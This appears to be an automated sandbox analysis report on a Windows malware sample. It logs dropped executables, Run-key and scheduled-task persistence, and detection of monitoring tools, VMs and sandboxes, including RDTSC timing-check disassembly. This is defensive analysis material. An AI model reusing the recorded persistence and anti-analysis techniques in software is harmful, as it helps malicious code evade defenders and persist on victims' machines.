Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\DocumentsJDAKJDAAFB.exe

Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 85c9ba9a2d.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d77e539f5f.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 167c7bdf2f.exe

Drops PE files to the user root directory

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\DocumentsJDAKJDAAFB.exe

Jump to dropped file

Monitors registry run keys for changes

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Source: C:\Users\user\DocumentsJDAKJDAAFB.exe

File created: C:\Windows\Tasks\skotes.job

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 167c7bdf2f.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 167c7bdf2f.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d77e539f5f.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d77e539f5f.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 85c9ba9a2d.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 85c9ba9a2d.exe

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6B55F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_6C6B55F0

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B214AE second address: B214B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B214B2 second address: B214B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B21607 second address: B21617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 ja 00007F10E0E4A426h 0x0000000c popad 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B21617 second address: B21647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F10E0B669D8h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F10E0B669CFh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B21647 second address: B21653 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F10E0E4A426h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B21653 second address: B21663 instructions: 0x00000000 rdtsc 0x00000002 js 00007F10E0B669C8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B21663 second address: B21667 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B21667 second address: B2166B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2166B second address: B21671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B217A8 second address: B217AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B217AC second address: B217CA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b jns 00007F10E0E4A426h 0x00000011 pop eax 0x00000012 pop edi 0x00000013 pushad 0x00000014 jl 00007F10E0E4A42Eh 0x0000001a push edi 0x0000001b pop edi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B217CA second address: B217E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F10E0B669CEh 0x0000000b je 00007F10E0B669C6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B217E4 second address: B217E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B21B6C second address: B21B78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B21B78 second address: B21B82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F10E0E4A426h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B21B82 second address: B21B88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2377E second address: B23782 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B23782 second address: B23788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B237C8 second address: B237D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0E4A42Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
